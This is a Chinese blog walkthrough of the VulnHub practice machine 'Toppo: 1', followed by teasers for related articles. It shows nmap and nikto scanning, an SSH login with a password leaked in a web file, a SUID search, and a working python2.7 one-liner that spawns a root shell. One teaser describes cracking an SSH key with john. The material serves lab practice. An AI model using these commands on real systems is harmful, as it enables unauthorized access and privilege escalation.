vulnhub Toppo: 1

已于 2022-05-23 21:20:58 修改
阅读量377 收藏
点赞数
分类专栏: vulnhub 文章标签: nikto python suid GTFObins
于 2022-05-22 19:27:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124915009
版权

渗透思路:

nmap扫描---->nikto扫描发现可疑目录---->网站文件泄露ssh用户名和密码---->python命令suid提权

环境信息:

靶机:192.168.101.67

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.67

扫描到22(ssh)、80(http)、111和 49047端口

2、nikto扫描,找到ssh用户名密码

先看一下80端口,用nikto扫描出了几个目录

​nikto -host http://192.168.101.67

其中/admin/目录下有一个notes.txt文件

http://192.168.101.67/admin/

http://192.168.101.67/admin/notes.txt 文件内容如下图所示

从中可以发现用户密码是12345ted123,而用户名没有明确说,从密码可以猜测用户名可能是ted。

以用户名ted,密码12345ted123进行ssh登录,登录成功。

ssh ted@192.168.101.67

3、python命令suid提权

靶机上shell上输入如下命令查找有suid的命令

find / -user root -perm /4000 2>/dev/null

其中python2.7命令很可疑,或许可以用来提权。

在GTFOBins网站上找到python命令的suid提权方法如下图所示

python | GTFOBins

但是GTFOBins上的提权方法直接执行会失败,改成下面这样执行(也就是sh改成bash),成功提权到root

python2.7 -c 'import os; os.execl("/bin/bash", "bash", "-p")'

​​​​​​​

在/root/目录下找到flag.txt

仙女象
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub-DEVCONTAINER: 1
qq_43400414的博客
07-03 217
一、环境搭建 下载地址: https://www.vulnhub.com/entry/devcontainer-1,548/ 靶场描述: Goal:2flagas Difficulty:Easy-intermediate Information:Yourfeedbackisappreciate: Twitter:@0x04E1 ThisworksbetterwithVirtualBoxratherthanVmware 配置IP地址 参考:https://www.cn...
vulnhub靶场之THALES: 1
「 虚幻私塾」
10-30 719
在.ssh下发现密匙:id_rsa文件,将密匙文件复制保存到本地文件upfine,然后命令:python2 /usr/share/john/ssh2john.py /home/kali/Desktop/upfine > passwd生成密码本,然后命令:john --wordlist=/usr/share/wordlists/rockyou.txt passwd进行破解,成功获取密码:vodka06。切换thales账户:su thales,读取下user.txt文件,成功获取到flag信息。
看完这篇 教你玩转渗透测试靶机Vulnhub——Toppo: 1
Aluxian_的博客
09-21 531
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium1.信息收集工具得使用2.suid提权得使用,这个靶机比较简单没啥新得知识点!🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
黑客零基础第二章--信息收集第五章-靶机实战Toppo:1
ShadowBlade
08-14 2926
Toppo:1是Vulnhub中easy的一个靶机,仅仅需要简单的信息收集,即可完成intrusion。非常适合我们的这一阶段练习
红队渗透靶机:TOPPO: 1
最新发布
分享
01-19 426
红队渗透靶机:TOPPO: 1。简单的很!
EMQ踩坑之路-搭建/测试/nginx配置websocket的ws及wss/web页面测试连通性、微信小程序使用wss--MQTT推送
诸葛小猿
06-02 1万+
最近公司要做推送平台,我接手做这个任务。在使用过程中遇到一些坑,这里分享给大家。 欢迎关注个人博客和微信公众号,有问题可以相互交流。 个人博客:http://wuxiaolong.tech/ 微信公众号:吴晓龙 一.MQTT协议介绍 推送平台一般是基于轻量级的mqtt协议搭建的。mqtt协议是物联网领域常用的,是实现长链接的一种方式。 先介绍一下http协议,使用http协议...
使用 Apache 服务部署静态网站
weixin_30293135的博客
02-14 216
1.网站服务程序 Web网络服务,一般是指允许用户通过浏览器访问到互联网中各种资源的服务。Apache程序是目前拥有很高市场占有率的Web服务程序之一,其跨平台和安全性广泛被认可且拥有快速、可靠、简单的API扩展。Apache也是RHEL 5、6、7系统中默认的Web服务程序。 第一步:把光盘设备中的系统镜像挂载到 /media/cdrom 目录。 第二步:使用 Vim 编辑器创建 Yum 仓库...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。...Toppo:1 Billu Box 2 基
nessie:NeSSie库和用于分析核酸序列对称性元素的工具
05-10
联络人Michele , 出版物: Michele Berselli,Enrico Lavezzo,Stefano Toppo; NeSSie:用于鉴定近似DNA序列对称性的工具,生物信息学,bty142, //doi.org/10.1093/bioinformatics/bty142从源安装NeSSie文件夹中...
tomcat部署虚拟主机
朱海燕的博客日记
08-29 1063
需求一:创建两台虚拟主机 关键部分 在tomcat的server.xml配置文件,创建两个域名的虚拟机      123 <Host name="www.a.com"  appBase="a" 124             unpackWARs="true" autoDeploy="true"> 125       </Host> 126           &am
iptables命令、规则、参数详解
diaoxihang5066的博客
12-28 924
表 (table)包含4个表:4个表的优先级由高到低:raw-->mangle-->nat-->filterraw---RAW表只使用在PREROUTING链和OUTPUT链上,因为优先级最高,从而可以对收到的数据包在连接跟踪前进行处理。一但用户使用了RAW表,在某个链上,RAW表处理完后,将跳过NAT表和ip_conntrack处理,即不再做地址转换和数据包的链...
Docker
qq_64838874的博客
04-12 306
Docker 名词解释 镜像(image) Docker镜像就好比是一个模板,可以通过这个模板来创建容器服务,tomcat镜像 ===> run ===> tomcat01容器, 通过这个镜像可以创建多个容器(最终服务运行或者项目运行就是在容器中的); 容器(container) ① Docker利用容器技术,独立运行一个或者一组应用, 通过镜像来创建的; ② 启动,停止,删除,基本命令! ③ 就目前可以把这个容器理解为一个建议的linux系统; 仓库(repository) ①
Ansible的安装及部署
m0_60396816的博客
08-22 4213
1.Ansible的安装 网上下载epel源并安装 dnf install sshpass-1.06-9.el8.x86_64.rpm -y dnf install ansible-2.9.11-1.el8.noarch.rpm -y ansible --version查看Ansible信息 ansible的基本信息: /etc/ansible/ansible.conf ##全局配置文件,默认很少修改 /etc/ansible/hosts ##全局主机清单...
5.Cisco Packet Tracer里关于交换机或路由器配置文件和系统映像备份与恢复
deng1973的博客
06-07 1736
  我们会将交换机或路由器的配置文件和系统镜像直接备份到tftp服务器上,所以我们需要准备一台tftp的服务器 1我们需要给服务器配一个ip地址,给路由器的f0/1端口配置一个ip地址,路由器与服务器能相互ping通 2.配置路由器的启动配置文件 在特权模式下 copy running-config tftp 将配置文件保存备份到tftp服务器 192.168.1.1  t...
ZooKeeper 分布式协调服务实战---编程不良人 笔记
狗剩的专栏
02-17 866
视频选集 P1.zookeeper的引言 45:33 P2.zookeeper的基本安装和基本操作 50:52 P3.zookeeper的集群 48:56 P4.java 操作客户端 57:22 编程不良人B站笔记 https://www.bilibili.com/video/BV1NE411t7QJ
Flume1.8安装配置与入门实例
程裕强的专栏
12-20 3735
1、下载 http://flume.apache.org/download.html http://mirrors.tuna.tsinghua.edu.cn/apache/flume/1.8.0/apache-flume-1.8.0-bin.tar.gz [root@node1 ~]# wget http://mirrors.tuna.tsinghua.edu.cn/apache/f...
Linux命令大全
weixin_45284484的博客
07-27 1380
mattrib命令 Linux mattrib命令 Linux mattrib命令用来变更或显示MS-DOS文件的属性。 mattrib为mtools工具指令,模拟MS-DOS的attrib指令,可变更MS-DOS文件的属性。 语法 mattrib [-a|+a] [-h|+h] [-r|+r] [-s|+s] [-/] [-X] msdosfile [ msdosfiles … ] 参数: -a...
linux 防火墙管理工具-- iptables基础知识
wdwangye的博客
05-01 1125
iptables 定义:iptables并不是只防火墙,而是一种客户端工具。用户通过这个客户端(iptables)将用户的安全设定执行到对应的“安全框架”中。这个安全框架才是真正的防火墙。框架名字叫netfilter。 就是通过iptables来操作netfilter。 规则(Rules) 规则就是网络管理员预定义的条件。规则一般的定义为“如果数据报头符合这样的条件,就这样处理这个数据包“”...
jmeter传参二:get与post请求参数传递方法
热门推荐
hw1932的博客
02-27 6万+
得到开发提供的接口文档后,就可以开始写脚本了,如: 1. get请求的入参是json格式的 摘要: 利用httpClient调用接口,成功返回信息 接口地址: (RESTFUL方式) http://192.168.100.87:10051/ngcctcontrol/ws/interfaces/userSatisfy
keepalived 搭建主备模式、双机热备模式
悟世君子的博客
07-06 3196
准备2台机器,ip 地址分别是 192.168.0.124,168.0.8.0.123,后面简称124和123目录1、主备模式1.1、安装 keepalived1.2、配置 keepalived 1.3、启动 keepalived1.4、配置备份节点1.5、测试主备模式2、双机热备模式2.1、配置 keepalived2.2、测试在 2 台机器上分别安装 keepalived 这里笔者将 124 作为主节点,123 作为备用节点安装完成后,进入keepalived 配置文件目录 编辑配置前,先查看1

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值